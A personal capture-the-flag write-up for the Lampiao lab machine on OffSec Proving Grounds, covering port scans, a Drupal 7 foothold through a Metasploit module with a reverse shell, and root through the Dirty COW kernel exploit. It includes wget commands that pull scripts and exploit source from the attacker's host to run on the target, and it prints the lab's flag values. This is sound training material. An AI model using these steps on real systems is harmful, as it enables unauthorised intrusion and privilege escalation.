Lampiao
This is my write ups for Lampiao (See original submission) on Off-Sec Proving Ground.
This room is a CTF type of room
I will try to go deep into the technical thing we do in this room.
1. Enum
- Start the machine and get the IP
- Export the IP to the terminal so we can use it easier
export IP=192.168.73.48;clear
## Test to see if the IP is correct
echo $IP
- Start our usual port scans
nmap -sC -sV $IP
rustscan -a $IP
Nmap default scan result
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
| 2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
| 256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_ 256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp open http?
| fingerprint-strings:
| HTTPOptions:
| _____ _ _
| |_|/ ___ ___ __ _ ___ _ _
| \x20| __/ (_| __ \x20|_| |_
| ___/ __| |___/ ___|__,_|___/__, ( )
| |___/
| ______ _ _ _
| ___(_) | | | |
| \x20/ _` | / _ / _` | | | |/ _` | |
|_ __,_|__,_|_| |_|
Rustscan result
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
1898/tcp open cymtec-port syn-ack
2. Foothold
- We got a landing page on port
1898
- Look like it it running
drupalbut what version ? Lets usenmapand scan for this port
nmap -A -p 1898 -sV $IP
---
PORT STATE SERVICE VERSION
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Lampi\xC3\xA3o
|_http-server-header: Apache/2.4.7 (Ubuntu)
- Look like the version is
drupal 7. Look for exploit onmsfconsole
msfconsole -q
search drupal 7 exploit
use 1
options
set rhosts 192.168.73.48
set lhost tun0
set rport 1898
run
shell
3. PrivEsc
- Upgrade shell with
python3
python3 -c 'import pty;pty.spawn("/bin/bash")';
export TERM=xterm
- We can upload the pee.sh script to the target machine and run it to find any interesting information that can help us become
root
## On kali machine
python3 -m http.server 88
## On target machine
cd /dev/shm
wget 192.168.49.73:88/pee.sh
chmod +x pee.sh
./pee.sh
pee.sh result
[+] Checking for the kernel of the machine:
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
- After looking for a while, i found that this machine is expose to Dirty Cow exploit
searchsploit dirty cow
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Pr | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Es | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Acce | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Acces | linux/local/40611.c
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
- Get the
cow
## On kali
searchsploit -m linux/local/40847.cpp
mv 40847.cpp cow.cpp
python3 -m http.server 88
---
## On target
cd /dev/shm
wget 192.168.49.73:88/cow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o cow cow.cpp -lutil
./cow -s
Get the flags
cat /home/tiago/local.txt /root/proof.txt
cat /home/tiago/local.txt /root/proof.txt
bca97901dbf535445a1a114a3242e64d
dedc79c7a9adc646d36984fdb498fde8